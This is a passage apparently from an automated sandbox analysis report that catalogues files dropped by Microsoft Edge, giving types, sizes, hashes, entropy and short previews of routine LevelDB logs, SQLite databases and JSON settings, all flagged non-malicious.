                                                                                                                                                                  Entropy (8bit):5.167443231186632
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/IXRRq1wkn23oH+Tcwt86FB2KLl9H4HN+q2Pwkn23oH+Tcwt865IFUv:7/afYeb/FFLzwIvYfYeb/WFUv
                                                                                                                                                                  MD5:AA934DE9028324928E1D4709BE60B2B4
                                                                                                                                                                  SHA1:6E0EB682E624A8555577168396B341CCFEEB8522
                                                                                                                                                                  SHA-256:D7E74C4B56C7404B902C373722FADC3BB9DB6F9EE03EFC0F4A6F7E0204A83080
                                                                                                                                                                  SHA-512:70329DCC08C0EDA66D2056DAED466206E024DEBB12981862597B8B9FF8D12DEA240868E720590CB26ABF86AE0C61884452D8585C912C76AD92AA7F6547EC5A07
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.302 1ec8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2025/01/06-17:17:54.316 1ec8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1197
                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                  MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                                  SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                                  SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                                  SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                  Entropy (8bit):5.198343435355949
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/MTUyq2Pwkn23oH+Tcwt8NIFUtNMcWz1ZmwzMVPgjRkwOwkn23oH+Tcwt8+eLJ:7/MTJvYfYebpFUtNMzz1/zMBgF5JfYey
                                                                                                                                                                  MD5:4D07A3CC297F31F5B98AB6CC1FA0796B
                                                                                                                                                                  SHA1:6B6066B5CF934CB5BFA3CB7564B78C88B2AFF375
                                                                                                                                                                  SHA-256:0BB4A935783699BC5E0278083005EEA04E391B3ECE5D9094A82615B2C852BC6D
                                                                                                                                                                  SHA-512:12A8CDC4DB161DBABB6C81DAA0FBECF64A882BA716F291E6F35BF2DC2B93B787DF67D84373679D1612F078EC99C7FBB6897817F905A25FCCC358DCF7E5BE847A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:55.293 1e94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/06-17:17:55.294 1e94 Recovering log #3.2025/01/06-17:17:55.295 1e94 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                  Entropy (8bit):0.3169096321222068
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                                  MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                                  SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                                  SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                                  SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.40981274649195937
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                                  MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                                  SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                                  SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                                  SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.5241404324800358
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
                                                                                                                                                                  MD5:241322143A01979D346689D9448AC8C0
                                                                                                                                                                  SHA1:DD95F97EE1CCB8FD9026D2156DE9CB8137B816D1
                                                                                                                                                                  SHA-256:65EEBDEC4F48A111AC596212A1D71C3A5CFA996797500E5344EEABDFA02527C8
                                                                                                                                                                  SHA-512:9C7241462A9DADEF25D8EEB1C14BABFBA65C451EBAFBC068B9856E4EF0EB6F894A44686CBB0D1F46C7F546335D0C53A3E386E6C1A017082DE127F8F9C0A54BD2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                  Entropy (8bit):0.32780102044485143
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:nA/J3+t76Y4QZZofU99pO0BYxlkqR4EZY4QZvG2:AhHQws9LdQZBQZG2
                                                                                                                                                                  MD5:202DA313EBEB15BCFF0F90BD01B61FBE
                                                                                                                                                                  SHA1:F8DCF2C11443871EC1B007FD3C60DF519667FAC6
                                                                                                                                                                  SHA-256:94B77862A83F5F2D3E4ABD5D1130D7C2C9E5422092FCF9CFFC7F633FE7AC7FA2
                                                                                                                                                                  SHA-512:197E59E5CC2F4C8F8CCEDA9F87D5E4ADAD98793A13C4B9AC892452974144DAC10B7ECA6F54571B0E99F9B7C3108D9DA57ABE69AC58623554242960BC21FFD471
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                  Entropy (8bit):3.5489333276543484
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:zj9P0FFcSQkQerR773pLQP/Kbt6hkCgam6IWRKToaAu:zdiqSe2R7KP/F+FmRKcC
                                                                                                                                                                  MD5:EAAE616CDEE5421C39E54F7C586C75A2
                                                                                                                                                                  SHA1:67C4C181D938DA92B92F04653C695C17302A5DAE
                                                                                                                                                                  SHA-256:744A583C900F9ED94D08849D056C27B2E61EC6140CC58CAD3EA1445A15B65170
                                                                                                                                                                  SHA-512:ABD7572B3BC83E502038CA99571350915CD1A4712C0CC0696E936F8A3745723F9D5BDEA54A9B11FF344C4A887081F270266A16551B8F91CB08033F54F36A7056
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):406
                                                                                                                                                                  Entropy (8bit):5.288361055136092
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7/ABOvYfYeb8rcHEZrELFUtNAi/zAO5JfYeb8rcHEZrEZSJ:7/pYfYeb8nZrExgNf7JfYeb8nZrEZe
                                                                                                                                                                  MD5:C77401B4DCE935AD5D67E2D0E812BA41
                                                                                                                                                                  SHA1:6CCADB59E7A86DFAECD9218345C9F021F104CCCF
                                                                                                                                                                  SHA-256:AD503A85E3637C8B6AD0301A27FFB64E99551DEE69F39D7419977E9813A04896
                                                                                                                                                                  SHA-512:95FC0D2BB5B73A7F293FD6B4F358D1C6CE73427A1834CE527DFB7B23EE9393D6C738071EFE49A9F677A420108A22228A1DF7260EC0BF9AF14E1280F8BB738949
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:59.372 1e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/06-17:17:59.373 1e04 Recovering log #3.2025/01/06-17:17:59.373 1e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1660
                                                                                                                                                                  Entropy (8bit):5.644719215983779
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:mZ6hC3QXZXJV03Sx4/HyztQEWSJ7AHHk2GJ348ylsT:m2Cy5JvQdP8osT
                                                                                                                                                                  MD5:D08659729C4AB97F019315F93C0045EC
                                                                                                                                                                  SHA1:F980E663DE6FABAE5DEA5F15509983A0983884A4
                                                                                                                                                                  SHA-256:58E048278F957ECAFA238605A7B2C0A730E15C02411E89D9BA4BE413C338ECE5
                                                                                                                                                                  SHA-512:FAFEB63BD74DFF122D6A25EC6C7F3FD7D8E2C5444ED5FB3298B0E46A8EEAE94653FB95B9CF479119B7E2F51137286B67B383E4EC5AE75EE34F9FF92B54CCD867
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..-b.................VERSION.1..META:https://ntp.msn.com..............!_https://ntp.msn.com..LastKnownPV..1736201884966.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736201886144.._https://ntp.msn.com..MUID!.1B715D3435BD60832FC8485834156189.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736201885071,"schedule":[-1,-1,-1,-1,24,26,25],"scheduleFixed":[-1,-1,-1,-1,24,26,25],"simpleSchedule":[9,52,12,49,13,27,26]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736201884936.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250106.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Mon Jan 06 2025 17:18:04 GMT-0500 (Eastern Standar
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):334
                                                                                                                                                                  Entropy (8bit):5.169342023753412
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/2Vq2Pwkn23oH+Tcwt8a2jMGIFUtNUgZmwzaOIkwOwkn23oH+Tcwt8a2jMmLJ:7/ivYfYeb8EFUtNd/za55JfYeb8bJ
                                                                                                                                                                  MD5:D0463577A9F9A58BD32F1558B8896385
                                                                                                                                                                  SHA1:57FDF088C6B49AE0B244F44D17634832118076B4
                                                                                                                                                                  SHA-256:73E2BD4969704040AAF79E0F3E6C34CB4797798909FE671E93F85F9C461C11F4
                                                                                                                                                                  SHA-512:036C25B3B08302BF24238D768CC9292FACD82457EF2108A13C2A49084C740CAD6678EE989A3A8FD5223BBBD9613E3B0BC0983B8A6D0F177162B182780DBF6AAF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.710 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:17:54.712 1870 Recovering log #3.2025/01/06-17:17:54.715 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):57344
                                                                                                                                                                  Entropy (8bit):0.863060653641558
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                  MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                  SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                  SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                  SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                  Entropy (8bit):0.40293591932113104
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                                  MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                                  SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                                  SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                                  SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):22
                                                                                                                                                                  Entropy (8bit):3.788754913993502
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YWRAW4J2LSQ:YWyW5SQ
                                                                                                                                                                  MD5:3BB76EC23C5506830EAD56540E06159F
                                                                                                                                                                  SHA1:94695E47D907E559E91E677CEC4EB763DC0C5CA9
                                                                                                                                                                  SHA-256:6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
                                                                                                                                                                  SHA-512:307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"sts":[],"version":2}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[]
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):2.7698042082512506
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:te+Auf+zbvepFMDRheh6Y3S8FogMKgNLXy2ZZiDsXckO0L/ZJV8Y:tTf2SFEu6Y3bzMKragDsXcf0L/ZJVb
                                                                                                                                                                  MD5:68834EB118D6795441C5BC64BD6CFF61
                                                                                                                                                                  SHA1:C8ECA67F4090F9F0FA9EA61F63E5524058B18A08
                                                                                                                                                                  SHA-256:A9950A25AFA94DC8B2E92F16EEE750BA30E2D12568AA2C807E39A0F1462AB04D
                                                                                                                                                                  SHA-512:5301F3A34BE193708A7C2DDCCC920C026B0414EEF297C39FDE7A5893F1C3F38A751B8A6EA67D48AF75A59DD5DA7427176C860A3A5A1B3C79E651ABFF3AE9C120
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
